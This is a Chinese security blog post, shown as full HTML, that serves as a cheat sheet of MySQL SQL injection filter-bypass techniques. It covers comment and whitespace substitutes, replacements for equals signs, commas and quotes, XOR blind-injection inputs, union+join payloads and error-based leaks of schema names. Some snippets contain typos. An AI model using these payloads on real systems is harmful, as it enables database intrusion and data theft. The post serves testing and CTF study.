<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="sql注入bypass"><meta name="keywords" content="sql"><meta name="author" content="Dar1in9"><meta name="copyright" content="Dar1in9"><title>sql注入bypass | Dar1in9's Blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer></script><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"MY1GAADR9W","apiKey":"5032629da4e94f659d98a4052bc1c5cd","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.0.0'
} </script><meta name="generator" content="Hexo 6.0.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#sql%E4%B8%AD%E7%9A%84%E6%B3%A8%E9%87%8A"><span class="toc-number">1.</span> <span class="toc-text">sql中的注释</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%A3%E6%9B%BF%E7%A9%BA%E6%A0%BC%E7%9A%84%E5%A4%9A%E7%A7%8D%E6%96%B9%E5%BC%8F"><span class="toc-number">2.</span> <span class="toc-text">代替空格的多种方式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E6%8B%AC%E5%8F%B7%EF%BC%88%E7%A9%BA%E6%A0%BC%E8%A2%AB%E8%BF%87%E6%BB%A4%EF%BC%89"><span class="toc-number">3.</span> <span class="toc-text">使用括号（空格被过滤）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AD%89%E5%8F%B7%E8%A2%AB%E8%BF%87%E6%BB%A4%E7%9A%84%E5%A4%9A%E7%A7%8D%E4%BB%A3%E6%9B%BF%E6%96%B9%E5%BC%8F"><span class="toc-number">4.</span> <span class="toc-text">等号被过滤的多种代替方式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E5%BC%82%E6%88%96%EF%BC%88and%E5%92%8Cor%E8%A2%AB%E8%BF%87%E6%BB%A4%EF%BC%89"><span class="toc-number">5.</span> <span class="toc-text">使用异或（and和or被过滤）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8join%EF%BC%88union-select%E4%B8%AD%E9%80%97%E5%8F%B7%E8%A2%AB%E8%BF%87%E6%BB%A4%EF%BC%89"><span class="toc-number">6.</span> <span class="toc-text">使用join（union select中逗号被过滤）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8greatest%E5%87%BD%E6%95%B0-%EF%BC%88%E5%A4%A7%E4%BA%8E%E5%B0%8F%E4%BA%8E%E7%AC%A6%E5%8F%B7%E8%A2%AB%E8%BF%87%E6%BB%A4%EF%BC%89"><span class="toc-number">7.</span> <span class="toc-text">使用greatest函数 （大于小于符号被过滤）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8hex%E7%BC%96%E7%A0%81%EF%BC%88%E5%9C%A8%E5%BC%95%E5%8F%B7%E8%A2%AB%E8%BF%87%E6%BB%A4%E6%97%B6%E8%A6%81%E4%BC%A0%E9%80%92%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%97%B6%E4%BD%BF%E7%94%A8%EF%BC%89"><span class="toc-number">8.</span> <span class="toc-text">使用hex编码（在引号被过滤时要传递字符串时使用）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8char%E5%87%BD%E6%95%B0%EF%BC%88%E5%9C%A8%E5%BC%95%E5%8F%B7%E8%A2%AB%E8%BF%87%E6%BB%A4%E6%97%B6%E8%A6%81%E4%BC%A0%E9%80%92%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%97%B6%E4%BD%BF%E7%94%A8%EF%BC%89"><span class="toc-number">9.</span> <span class="toc-text">使用char函数（在引号被过滤时要传递字符串时使用）</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%88%AA%E5%8F%96%E5%87%BD%E6%95%B0"><span class="toc-number">10.</span> <span class="toc-text">字符串截取函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#conv-10-36-%E4%BB%A3%E6%9B%BF%E5%AD%97%E6%AF%8D"><span class="toc-number">11.</span> <span class="toc-text">conv(,10,36)代替字母</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#union-join-%E9%80%97%E5%8F%B7%E8%A2%AB%E8%BF%87%E6%BB%A4"><span class="toc-number">12.</span> <span class="toc-text">union+join(逗号被过滤)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#bool%E7%9B%B2%E6%B3%A8%E5%8F%AF%E4%BB%A5%E7%94%A8%E7%9A%84"><span class="toc-number">13.</span> <span class="toc-text">bool盲注可以用的</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#mysql%E7%89%B9%E6%80%A7"><span class="toc-number">14.</span> <span class="toc-text">mysql特性</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://blog-1300147235.cos.ap-chengdu.myqcloud.com/kakashi-cat.jpg"></div><div class="author-info__name text-center">Dar1in9</div><div class="author-info__description text-center">人间值得，未来可期</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/Dar1in9s">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">89</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">17</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">17</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://gryffinbit.top">Gryffinbit</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/Background2.png)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Dar1in9's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">sql注入bypass</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2022-03-04</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">1.2k</span><span class="post-meta__separator">|</span><span>阅读时长: 5 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><p>平时遇到的sql注入基本上都会存在过滤，这里讲讲如何绕过，主要是一些关键字的功能替换。</p>
<span id="more"></span>

<h2 id="sql中的注释"><a href="#sql中的注释" class="headerlink" title="sql中的注释"></a>sql中的注释</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">--+、 #、 %23、 -- -、 %00、 `、 //、 /* */</span><br></pre></td></tr></table></figure>

<p>sql中的可执行注释：<code>/*!...*/</code>，注释当中的语句会被 MySQL 正常解析和执行，但在其他数据库管理系统将被作为注释忽略。</p>
<h2 id="代替空格的多种方式"><a href="#代替空格的多种方式" class="headerlink" title="代替空格的多种方式"></a>代替空格的多种方式</h2><p><code>\t</code>：Tab键</p>
<p><code>+</code>号</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span><span class="operator">+</span>pass<span class="operator">+</span><span class="keyword">from</span><span class="operator">+</span><span class="keyword">user</span><span class="operator">+</span><span class="keyword">where</span><span class="operator">+</span>id<span class="operator">=</span><span class="number">1</span></span><br></pre></td></tr></table></figure>

<p><code>/**/、/*xxx*/</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span><span class="comment">/**/</span>pass<span class="comment">/**/</span><span class="keyword">from</span><span class="comment">/**/</span><span class="keyword">user</span><span class="comment">/**/</span><span class="keyword">where</span><span class="comment">/**/</span>id<span class="operator">=</span><span class="number">1</span></span><br></pre></td></tr></table></figure>

<p><code>%20、%09、%0b、%0d、%0a</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span><span class="operator">%</span><span class="number">0</span>apass<span class="operator">%</span><span class="number">0</span>afrom<span class="operator">%</span><span class="number">0</span>auser<span class="operator">%</span><span class="number">0</span>awhere<span class="operator">%</span><span class="number">0</span>aid<span class="operator">=</span><span class="number">1</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>SQLite3：0A 0D 0C 09 20<br>MySQL5：09 0A 0B 0C 0D A0 20<br>PosgresSQL：0A 0D 0C 09 20<br>Oracle 11g：00 0A 0D 0C 09 20<br>MSSQL：01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20</p>
</blockquote>
<p><code>@</code> (select之后) </p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">union</span> <span class="keyword">select</span><span class="variable">@1</span>,<span class="number">2</span>,<span class="number">3</span></span><br></pre></td></tr></table></figure>

<p><code>select A from B</code> 的空格</p>
<blockquote>
<p>select Afrom B 默认from后面必须是空格再加表名，因此为了不让你使用from可能正则表达式会检测后面的空格，我们可以用科学计数法绕过，因为1e0后面可以没有空格</p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> A,<span class="number">1</span> <span class="keyword">from</span> B  <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span> <span class="keyword">select</span> A,<span class="number">1E0</span>fromB</span><br><span class="line"><span class="keyword">select</span> A,<span class="number">1</span> <span class="keyword">from</span> B  <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span> <span class="keyword">select</span> A,<span class="number">1.0</span>fromB</span><br></pre></td></tr></table></figure>

<h2 id="使用括号（空格被过滤）"><a href="#使用括号（空格被过滤）" class="headerlink" title="使用括号（空格被过滤）"></a>使用括号（空格被过滤）</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> pass <span class="keyword">from</span> admin <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>   <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span> <span class="keyword">select</span>(pass)<span class="keyword">from</span>(admin)<span class="keyword">where</span>(id<span class="operator">=</span><span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> pass <span class="keyword">from</span> admin <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>   <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span><span class="keyword">union</span>(<span class="keyword">select</span>(pass)<span class="keyword">from</span>(admin)<span class="keyword">where</span>(id<span class="operator">=</span><span class="number">1</span>))</span><br></pre></td></tr></table></figure>

<h2 id="等号被过滤的多种代替方式"><a href="#等号被过滤的多种代替方式" class="headerlink" title="等号被过滤的多种代替方式"></a>等号被过滤的多种代替方式</h2><p>&lt;&gt;与!结合</p>
   <figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> pass <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> <span class="operator">!</span>(id<span class="operator">&lt;&gt;</span><span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"><span class="operator">!</span>(ascii(substr((<span class="keyword">select</span> password <span class="keyword">from</span> admin) <span class="keyword">from</span> <span class="number">1</span>))<span class="operator">&lt;&gt;</span><span class="number">53</span>)</span><br></pre></td></tr></table></figure>

<p>like代替</p>
   <figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> pass <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> id <span class="operator">=</span><span class="number">1</span>  <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span> <span class="keyword">select</span> pass <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> id <span class="keyword">like</span> <span class="number">1</span></span><br><span class="line"></span><br><span class="line">id<span class="operator">=</span><span class="number">1</span><span class="string">&#x27;and 1=1	==&gt; id=1&#x27;</span><span class="keyword">and</span> <span class="number">1</span> <span class="keyword">like</span> <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p> in代替</p>
   <figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> pass <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> id<span class="operator">=</span><span class="number">1</span>  <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span> <span class="keyword">select</span> pass <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> id <span class="keyword">in</span>(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">id <span class="operator">=</span><span class="number">1</span><span class="string">&#x27; and 1=1 ==&gt; id=1&#x27;</span> <span class="keyword">and</span> <span class="number">1</span> <span class="keyword">in</span>(<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<p>regexp代替 （正则）</p>
   <figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> pass <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> id <span class="operator">=</span><span class="number">1</span>  <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span> <span class="keyword">select</span> pass <span class="keyword">from</span> <span class="keyword">user</span> <span class="keyword">where</span> id regexp <span class="number">1</span></span><br><span class="line"></span><br><span class="line">id<span class="operator">=</span><span class="number">1</span><span class="string">&#x27;and 1=1    ==&gt;id=1&#x27;</span><span class="keyword">and</span> <span class="number">1</span> <span class="keyword">like</span> <span class="number">1</span></span><br></pre></td></tr></table></figure>
<h2 id="使用异或（and和or被过滤）"><a href="#使用异或（and和or被过滤）" class="headerlink" title="使用异或（and和or被过滤）"></a>使用异或（and和or被过滤）</h2><p>mysql中的异或运算符为<code>^</code>或<code>xor</code>(如果<code>or</code>被过滤了，<code>xor</code>也没用)。</p>
<p>异或原理：两个条件相同（同真或同假）即为假（0），两个条件不同即为真（1），null与任何条件做异或运算都为null。</p>
<p>在sql注入中常用于盲注。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">select * from user where name =&#x27;$Input&#x27;</span><br><span class="line"></span><br><span class="line">$Input = admin&#x27;^(0)#       ==&gt;真^假=真</span><br><span class="line">$input = admin&#x27;^(1)#       ==&gt;真^真=假</span><br></pre></td></tr></table></figure>

<h2 id="使用join（union-select中逗号被过滤）"><a href="#使用join（union-select中逗号被过滤）" class="headerlink" title="使用join（union select中逗号被过滤）"></a>使用join（union select中逗号被过滤）</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="number">1</span>)a <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">2</span>)b <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">3</span>)c</span><br></pre></td></tr></table></figure>

<h2 id="使用greatest函数-（大于小于符号被过滤）"><a href="#使用greatest函数-（大于小于符号被过滤）" class="headerlink" title="使用greatest函数 （大于小于符号被过滤）"></a>使用greatest函数 （大于小于符号被过滤）</h2><p><code>greatest(a,b)</code>       返回大的那个数</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">greatest(a,<span class="number">1</span>)<span class="operator">=</span>a     <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span> a<span class="operator">&gt;=</span><span class="number">1</span></span><br><span class="line">greatest(ascii(substr(<span class="string">&#x27;abc&#x27;</span>,<span class="number">1</span>,<span class="number">1</span>)),<span class="number">50</span>)<span class="operator">=</span><span class="number">50</span>    <span class="operator">=</span><span class="operator">&gt;</span> ascii(substr(<span class="string">&#x27;abc&#x27;</span>,<span class="number">1</span>,<span class="number">1</span>)<span class="operator">&lt;=</span><span class="number">50</span></span><br></pre></td></tr></table></figure>

<h2 id="使用hex编码（在引号被过滤时要传递字符串时使用）"><a href="#使用hex编码（在引号被过滤时要传递字符串时使用）" class="headerlink" title="使用hex编码（在引号被过滤时要传递字符串时使用）"></a>使用hex编码（在引号被过滤时要传递字符串时使用）</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> &quot;abc&quot;     <span class="operator">=</span><span class="operator">=</span> <span class="keyword">select</span> <span class="number">0x616263</span></span><br><span class="line"><span class="keyword">select</span> column_name <span class="keyword">from</span> information_schema.columns <span class="keyword">where</span> table_name<span class="operator">=</span><span class="number">0x616263</span></span><br></pre></td></tr></table></figure>

<h2 id="使用char函数（在引号被过滤时要传递字符串时使用）"><a href="#使用char函数（在引号被过滤时要传递字符串时使用）" class="headerlink" title="使用char函数（在引号被过滤时要传递字符串时使用）"></a>使用char函数（在引号被过滤时要传递字符串时使用）</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="type">char</span>(<span class="number">97</span>);       <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span>  <span class="keyword">select</span> <span class="string">&#x27;a&#x27;</span>;</span><br><span class="line"><span class="keyword">select</span> <span class="type">char</span>(<span class="number">97</span>,<span class="number">98</span>,<span class="number">99</span>);   <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span>   <span class="keyword">select</span> <span class="string">&#x27;abc&#x27;</span></span><br></pre></td></tr></table></figure>

<h2 id="字符串截取函数"><a href="#字符串截取函数" class="headerlink" title="字符串截取函数"></a>字符串截取函数</h2><p><code>substr(str,index,len)</code> 截取str，从index开始，截取长度为len</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">surstr(&quot;123&quot;,<span class="number">1</span>,<span class="number">1</span>)     <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span><span class="number">1</span></span><br></pre></td></tr></table></figure>

<p><code>substring(str,index,len)</code> 截取str，从index开始，截取长度为len</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">surbtring(&quot;123&quot;,<span class="number">1</span>,<span class="number">1</span>)     <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span><span class="number">1</span></span><br></pre></td></tr></table></figure>

<p><code>mid(str,index,len)</code> 截取str，从index开始，截取长度为len</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mid(&quot;123&quot;,<span class="number">1</span>,<span class="number">1</span>)     <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span><span class="number">1</span></span><br></pre></td></tr></table></figure>

<p><code>insert(str,pos,len,newstr)</code> 在原始字符串 str 中，将自左数第 pos 位开始，长度为 len 个字符的字符串替换为新字符串 newstr，然后返回经过替换后的字符串。 pos从1开始</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">insert</span>(str,len,<span class="number">1</span>,<span class="number">0x0</span>)`可当做截取函数：`substr(str, <span class="number">1</span>, len)  <span class="operator">&lt;=</span><span class="operator">=</span><span class="operator">&gt;</span>   <span class="keyword">insert</span>(str, len<span class="operator">+</span><span class="number">1</span>, length(str), &quot;&quot;)</span><br></pre></td></tr></table></figure>

<p><code>left(str,len)</code> 截取str，从左边第一个开始截取，截取长度为len</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">left</span>(&quot;123&quot;,<span class="number">2</span>)     <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span><span class="number">12</span></span><br></pre></td></tr></table></figure>

<p><code>right(str,len)</code> 取str，从右边第一个开始截取，截取长度为len</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">right</span>(&quot;123&quot;,<span class="number">2</span>)     <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span><span class="number">23</span></span><br></pre></td></tr></table></figure>

<p><code>rpad(str, len, padstr)</code> 在 str 右方补齐 len 位的字符串 padstr，返回新字符串。<br>如果 str 长度大于 len，则返回值的长度将缩减到 len 所指定的长度。同理还有<code>lpad()</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rpad(&quot;123&quot;, <span class="number">1</span>, <span class="number">1</span>)    <span class="operator">=</span><span class="operator">&gt;</span> <span class="number">1</span></span><br></pre></td></tr></table></figure>

<p><code>trim(Afrom(B)) </code>  把字符串B中的A删去，返回剩余部分</p>
<h2 id="conv-10-36-代替字母"><a href="#conv-10-36-代替字母" class="headerlink" title="conv(,10,36)代替字母"></a>conv(,10,36)代替字母</h2><p>conv函数进行进制转换，而36进制包含了所有的字母</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">conv(<span class="number">10</span>,<span class="number">10</span>,<span class="number">36</span>) <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span> A</span><br><span class="line"><span class="built_in">lower</span>(conv(<span class="number">10</span>,<span class="number">10</span>,<span class="number">36</span><span class="operator">/</span><span class="number">16</span>s)) <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span> a</span><br></pre></td></tr></table></figure>

<h2 id="union-join-逗号被过滤"><a href="#union-join-逗号被过滤" class="headerlink" title="union+join(逗号被过滤)"></a>union+join(逗号被过滤)</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> ((<span class="keyword">select</span> <span class="number">1</span>)A <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">2</span>)B <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">3</span>)C <span class="keyword">join</span> (<span class="keyword">select</span> <span class="number">4</span>)D);</span><br><span class="line"><span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span></span><br></pre></td></tr></table></figure>



<h2 id="bool盲注可以用的"><a href="#bool盲注可以用的" class="headerlink" title="bool盲注可以用的"></a>bool盲注可以用的</h2><p><code>position(&#39;ro&#39;in user())</code><br><code>locate(&#39;ro&#39;,user())</code></p>
<h2 id="mysql特性"><a href="#mysql特性" class="headerlink" title="mysql特性"></a>mysql特性</h2><p>当使用自定义函数不存在的时候会报错显示出库的名字</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> a() <span class="keyword">from</span> users   <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span>  <span class="keyword">FUNCTION</span> dvwa.a does <span class="keyword">not</span> exist</span><br></pre></td></tr></table></figure>

<p>当查找重复的列的时候会报错显示出列的名字</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users <span class="keyword">as</span> A <span class="keyword">join</span> users) <span class="keyword">as</span> C  <span class="operator">=</span><span class="operator">=</span><span class="operator">&gt;</span>Duplicate <span class="keyword">column</span> name <span class="string">&#x27;user_id&#x27;</span></span><br></pre></td></tr></table></figure>

</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">Dar1in9</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://dar1in9s.github.io/2022/03/04/web安全/sql注入bypass/">http://dar1in9s.github.io/2022/03/04/web安全/sql注入bypass/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://Dar1in9s.github.io">Dar1in9's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/sql/">sql</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2022/03/04/php/php%E5%B8%B8%E5%88%A9%E7%94%A8%E7%9A%84%E5%87%BD%E6%95%B0/"><i class="fa fa-chevron-left">  </i><span>php常利用的函数</span></a></div><div class="next-post pull-right"><a href="/2022/03/04/php/phpinfo%E4%B8%AD%E7%9A%84%E9%87%8D%E8%A6%81%E4%BF%A1%E6%81%AF/"><span>phpinfo中的重要信息</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1300147235.cos.ap-chengdu.myqcloud.com/Background2.png)"><div class="layout" id="footer"><div class="copyright">&copy;2020 - 2024 By Dar1in9</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script 